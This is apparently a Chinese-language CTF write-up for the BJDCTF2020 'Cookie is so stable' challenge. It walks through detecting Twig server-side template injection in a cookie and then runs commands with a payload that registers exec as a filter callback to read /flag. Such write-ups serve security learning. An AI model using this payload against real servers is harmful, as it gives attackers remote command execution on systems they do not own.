模板注入 [BJDCTF2020]Cookie is so stable1

打开题目

有flag页面，有Hint页面

这里题目有提示，突破口是在cookie上面

经过测试发现有ssti注入：

抓包

 

判断模板注入类型的办法

输入

{{7*‘7’}}

回显49

输入{{7*‘7’}}，返回49表示是 Twig 模块

输入{{7*‘7’}}，返回7777777表示是 Jinja2 模块

所以判断是Twig

这里在cookie处进行判断

user={{7*‘7’}},查看返回值

这个模板注入是Twig注入

这里注意要在PHPSESSID后user前加上;分隔开

由于是Twig注入，所以是有固定的payload

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}//查看id

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}//查看flag

在cookie输入

构造获取flag的payload

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}//查看flag

得到flag